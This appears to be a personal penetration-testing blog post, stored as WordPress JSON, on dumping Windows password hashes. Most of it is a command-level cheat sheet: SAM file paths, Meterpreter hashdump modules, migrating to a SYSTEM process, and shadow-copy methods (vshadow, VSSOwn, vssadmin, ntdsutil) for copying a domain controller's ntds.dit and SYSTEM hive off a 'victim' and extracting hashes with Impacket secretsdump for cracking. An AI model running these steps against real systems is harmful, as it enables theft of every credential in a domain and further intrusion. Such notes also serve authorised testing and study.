{"id":761,"date":"2020-02-27T21:09:04","date_gmt":"2020-02-27T20:09:04","guid":{"rendered":"https:\/\/privat.andreas-klingler.de\/itsec\/?p=761"},"modified":"2024-09-15T12:53:39","modified_gmt":"2024-09-15T10:53:39","slug":"windows-sam-files","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=761","title":{"rendered":"Windows password files"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Win\u00addows clients use <span class=\"caps\">SAM<\/span> files. Win\u00addows <span class=\"caps\">DC<\/span> uses ntds.dit to store all hash\u00ades from the domain.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\"><span class=\"caps\">SAM<\/span><\/h1>\n\n\n\n<pre class=\"wp-block-preformatted\">C:\\windows\\repair\\sam\nC:\\windows\\System32\\config\\SAM\nC:\\windows\\System32\\config\\RegBack\\SAM<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtives in meterpreter:<\/p>\n\n\n\n<pre id=\"pre-msfu\" class=\"wp-block-preformatted\">run post\/windows\/gather\/hashdump\nrun post\/windows\/gather\/smart_hashdump\nrun hashdump\nhashdump (load module before: use priv)\ncreds_all<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If hash\u00addump does\u00adn\u2019t&nbsp;work:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Try anoth\u00ader meter\u00adpreter shell. E.g. the <span class=\"caps\">PHP<\/span> meter\u00adpreter shell lacks some capa\u00adbil\u00adi\u00adties. Try to exe\u00adcute a native <span class=\"caps\">OS<\/span> meter\u00adpreter reverse shell on the victim.<\/li>\n\n\n\n<li>Try to migrate to anoth\u00ader process which runs as <span class=\"caps\">SYSTEM<\/span>. Even as an admin\u00adis\u00adtra\u00adtor, it can be that you can\u00adnot read the <span class=\"caps\">SAM<\/span> file. But if you inject a meter\u00adpreter ses\u00adsion as <span class=\"caps\">SYSTEM<\/span>, then it works. (<a href=\"https:\/\/malicious.link\/post\/2011\/2011-05-16-dumping-hashes-on-win2k8-r2-x64-with-metasploit\/\">Inter\u00adest\u00ading blog post<\/a>)<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Notes<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>samdump2<\/strong> can extract hash\u00ades out of Win 2000\/<span class=\"caps\">XP<\/span>\/<span class=\"caps\">NT<\/span>\/Vista <span class=\"caps\">SAM<\/span>&nbsp;files.<\/li>\n\n\n\n<li>If the file is not acces\u00adsi\u00adble, try <strong>hash\u00addump<\/strong> in Meter\u00adpreter (if not avail\u00adable, load <em>use priv<\/em> before).<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Format<\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">Username : UID : LM hash : NTLM hash : : :<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">For hash\u00adcat, use \u2011m1000 and copy the <span class=\"caps\">NTLM<\/span>&nbsp;hash.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Shadow Copies<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">A Shad\u00adow Copy is a back\u00adup of a vol\u00adume to make snap\u00adshots. If we are a (domain) admin, we can use <code>vshadow.exe<\/code> to extract sen\u00adsi\u00adtive files like the <span class=\"caps\">NTDS<\/span>.dit file (the Active Direc\u00adto\u00adry Data\u00adbase&nbsp;File).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Pre\u00adreq\u00adui\u00adsites:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Admin\u00adis\u00adtra\u00adtive privileges<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Exam\u00adple to get the Active Direc\u00adto\u00adry Data\u00adbase&nbsp;file:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Per\u00adform a shad\u00adow copy with vshadow.exe (see p61 repo to upload)<br><code>vshadow.exe -nw -p C:<\/code><\/li>\n\n\n\n<li>Copy the ntds.dit file from the shad\u00adow copy to the \u201clive\u201d filesys\u00adtem:<br><code>copy $addHereTheShadowCopyDeviceName\\windows\\ntds\\ntds.dit C:\\Temp<\/code><\/li>\n\n\n\n<li>Copy the Sys\u00adtem hive from the reg\u00adistry:<br><code>reg.exe save hklm\\system C:\\Temp\\system_hive.bak<\/code><\/li>\n\n\n\n<li>Copy these two files to your own system.<\/li>\n\n\n\n<li>Use Impack\u00adet\u2019s secrets\u00addump to extract the juicy infor\u00adma\u00adtion:<br><code>impacket-secretsdump -ntds ntds.dit.bak -system system_hive.bak LOCAL<\/code><\/li>\n\n\n\n<li>Use or\/and crack the obtained credentials.<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">VSSown<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Use <a href=\"https:\/\/github.com\/lanmaster53\/ptscripts\/blob\/master\/windows\/vssown.vbs\">VSSOwn<\/a> to cre\u00adate a \u201cback\u00adup\u201d of ntds.dit. Upload it to the vic\u00adtim and&nbsp;then:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">vscript vssown.vbs \/status\nvscript vssown.vbs \/start\nvscript vssown.vbs \/create \/c<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Then, copy ntds.dit, <span class=\"caps\">SAM<\/span> and <span class=\"caps\">SYSTEM<\/span> from the back\u00adup to the attack\u00ader system:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[$SomeNumberHere]\\windows\\ntds\\ntds.dit ntdsbackup.dit<br>copy \\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[$SomeNumberHere]\\windows\\system32\\config\\SYSTEM systembackup.bak<br>copy \\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[$SomeNumberHere]\\windows\\system32\\config\\SAM sambackup.bak<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now, use Impack\u00adet\u2019s secretsdump.py.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">VSSAdmin<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/nixawk\/pentest-wiki\/blob\/master\/4.Post-Exploitation\/Windows_ActiveDirectory\/How-to-use-vssadmin.md\">Vssad\u00admin<\/a> lets man\u00adage shad\u00adow copies. On a Win\u00addows com\u00admand, list all shad\u00adow copies:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">vssadmin.exe list shadows<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If there is no (cur\u00adrent) one, cre\u00adate a new shad\u00adow&nbsp;copy:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">vssadmin create shadow \/for=c:<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Exe\u00adcute the list com\u00admand and note the num\u00adber of the shad\u00adow copy. Now, copy the inter\u00adest\u00ading&nbsp;files:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">copy \\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy$HERETHENUMBER\\windows\\ntds\\ntds.dit c:\\temp\\ntds.dit\nreg save hklm\\system c:\\temp\\system \/y<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now, copy both files to your local sys\u00adtem. (And delete them from the serv\u00ader!) Extract the hashes:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">secretsdump.py -ntds ntds.dit -system system -outputfile hashes.txt LOCAL<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">NTDSUtil<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The ntd\u00adsu\u00adtil has a \u201cInstall From Media\u201d (<span class=\"caps\">IFM<\/span>) fea\u00adture which can be used to cre\u00adate a domain backup.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\mybackup\" quit quit<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Then, get the files from the direc\u00adto\u00adry and pro\u00adceed with secretsdump.py.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Win\u00addows clients use <span class=\"caps\">SAM<\/span> files. Win\u00addows <span class=\"caps\">DC<\/span> uses ntds.dit to store all hash\u00ades from the domain. <span class=\"caps\">SAM<\/span> C:\\windows\\repair\\sam C:\\windows\\System32\\config\\<span class=\"caps\">SAM<\/span> C:\\windows\\System32\\config\\RegBack\\<span class=\"caps\">SAM<\/span> Alter\u00adna\u00adtives in meter\u00adpreter: run post\/windows\/gather\/hashdump run post\/windows\/gather\/smart_hashdump run hash\u00addump hash\u00addump (load mod\u00adule before: use priv) creds_all If hash\u00addump does\u00adn\u2019t&nbsp;work: Notes For\u00admat User\u00adname : <span class=\"caps\">UID<\/span> : <span class=\"caps\">LM<\/span> hash : <span class=\"caps\">NTLM<\/span> hash : : : For hashcat,&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[471],"tags":[111,198,24],"class_list":["post-761","post","type-post","status-publish","format-standard","hentry","category-privesc","tag-password","tag-sam","tag-windows"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/761","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=761"}],"version-history":[{"count":20,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/761\/revisions"}],"predecessor-version":[{"id":4378,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/761\/revisions\/4378"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}